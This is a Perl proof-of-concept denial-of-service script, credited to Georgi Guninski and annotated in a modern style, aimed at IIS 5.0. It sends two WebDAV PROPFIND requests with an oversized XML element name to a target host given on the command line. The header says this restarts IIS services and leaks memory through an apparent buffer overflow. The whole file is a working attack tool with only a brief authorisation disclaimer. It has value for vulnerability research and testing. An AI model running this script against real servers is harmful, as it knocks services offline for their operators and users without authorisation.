#!/usr/bin/perl
#                                     Written by Georgi Guninski
# Description:
#
# It is possible to remotely restart all IIS-related services using a
# specially crafted PROPFIND request.  It is also possible to force IIS
# to consume memory which it does not free.  This looks like a buffer
# overflow; whether it is exploitable beyond denial of service is not
# known -- let me know if you find a way to exploit it.
#
# Proof-of-concept only: it sends oversized WebDAV PROPFIND bodies to
# the target and reports nothing beyond a dot per request sent.  Use it
# only against systems you are authorized to test.

use IO::Socket;

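print "IIS 5.0 propfind\n";

# Target taken from the command line:  <script> HOST [PORT]
# $host/$port stay package globals because vv() below reads them.
# Use element access ($ARGV[0]) instead of the one-element slice
# (@ARGV[0]) the original used, which only worked by accident and warns.
our $host = $ARGV[0];
our $port = defined $ARGV[1] ? $ARGV[1] : 80;   # default to plain HTTP

die "usage: $0 <host> [port]\n" unless defined $host && length $host;
die "port must be numeric, got '$port'\n" unless $port =~ /^\d+$/;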

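sub vv
{
  # Send one PROPFIND request whose XML body contains an oversized element
  # name ("<u:VVVV...V />"), then read at most 300 bytes of the reply.
  #
  # Args:
  #   $ll           - repeat count; length of the oversized token
  #   $ch           - character (or string) to repeat
  #   $target_host  - optional; defaults to the global $host set from @ARGV
  #   $target_port  - optional; defaults to the global $port set from @ARGV
  #
  # Returns nothing useful.  If the TCP connect fails it warns and returns
  # early instead of silently returning as the original did.
  #
  # Note: the original declared this as "sub vv()" -- an empty prototype --
  # while being called with two arguments; the prototype is dropped so a
  # plain vv(LIST) call compiles.
  my ($ll, $ch, $target_host, $target_port) = @_;
  $target_host = $host unless defined $target_host;
  $target_port = $port unless defined $target_port;

  my $over = $ch x $ll;   # the oversized token

  my $socket = IO::Socket::INET->new(PeerAddr => $target_host,
                                     PeerPort => $target_port,
                                     Proto    => "TCP");
  unless ($socket) {
    warn "connect to $target_host:$target_port failed: $@\n";
    return;
  }

  # Variant: put the oversized token into the namespace URI as well,
  #   xmlns:u="$over:"
  # That is a separate issue and also works with length ~>65000.  The
  # request actually sent below uses the literal string "over" there and
  # only the element name is oversized.
  my $xml = '<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'
          . "over"
          . ':"><a:prop><a:displayname />'
          . "<u:$over />"
          . '</a:prop></a:propfind>'
          . "\n\n";
  my $content_length = length($xml);

  # Line endings are bare "\n" and an extra "\n\n" follows the body beyond
  # Content-length -- kept exactly as in the original PoC, which was tested
  # that way.  Strict HTTP/1.1 would use "\r\n".
  my $req = "PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $target_host\nContent-length: $content_length\n\n$xml\n\n";
  syswrite($socket, $req, length($req));
  print ".";

  my $res;
  $socket->read($res, 300);   # reply is read but not used
  #print "r=".$res;
  close $socket;
}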

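# Fire two requests one second apart.  The original used "do vv(...)",
# the deprecated "do SUBROUTINE(LIST)" form, which is a syntax error on
# Perl 5.20 and later; a plain call is equivalent.
vv(128008, "V");   # may need to change the length
sleep(1);
vv(128008, "V");
print "Done.\n";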
